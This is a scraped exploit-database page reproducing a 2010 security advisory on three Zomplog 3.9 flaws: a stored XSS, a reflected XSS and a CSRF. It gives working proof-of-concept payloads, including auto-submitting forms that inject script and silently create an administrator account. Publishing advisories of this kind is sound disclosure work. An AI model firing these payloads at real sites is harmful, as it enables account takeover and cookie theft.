Home / os / win7

[webapps / 0day] - Zomplog 3.9 Multiple XSS & XSRF Vulne

Posted on 27 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Zomplog 3.9 Multiple XSS &amp; XSRF Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Zomplog 3.9 Multiple XSS &amp; XSRF Vulnerabilities by High-Tech Bridge . in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===============================================
Zomplog 3.9 Multiple XSS &amp; XSRF Vulnerabilities
===============================================

Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_1.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
 
The vulnerability exists due to failure in the &quot;/admin/settings_menu.php&quot; script to properly sanitize user-supplied input in &quot;about&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
 
An attacker can use browser to exploit this vulnerability. The following PoC is available:
 
&lt;form action=&quot;http://host/admin/settings_menu.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;Submit&quot; value=&quot;Submit ››&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;search&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;teasers&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;archive&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;latestentries&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;nr_entries&quot; value=&quot;10&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;latestcomments&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;nr_comments&quot; value=&quot;10&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;categories&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;authors&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;pages&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;meta&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;login&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;use_join&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;powered&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;about&quot; value=&#039;about&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&#039;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;customfield&quot; value=&quot;customfield&quot;&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;
 
 
-----------------------------------------------------------------------------------------------------------------
 
Vulnerability ID: HTB22644
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_2.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
 
The vulnerability exists due to failure in the &quot;/admin/editor_pages.php&quot; script to properly sanitize user-supplied input in &quot;id&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
 
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/editor_pages.php?id=1&#039;&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 
 
-----------------------------------------------------------------------------------------------------------------
 
Vulnerability ID: HTB22645
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
Product: Zomplog
Vendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )
Vulnerable Version: 3.9 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/admin/users.php&quot; script to properly verify the source of HTTP request.
 
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
 
Attacker can use browser to exploit this vulnerability. The following PoC is available:
 
&lt;form action=&quot;http://host/admin/users.php&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;login&quot; value=&quot;newuserlogin&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;password&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password2&quot; value=&quot;password&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;admin&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot; name=&quot;submit&quot; value=&quot;Submit ››&quot;&gt;
&lt;/form&gt;
&lt;script&gt;
document.getElementById(&#039;btn&#039;).click();
&lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-27]</pre></body></html>

 

TOP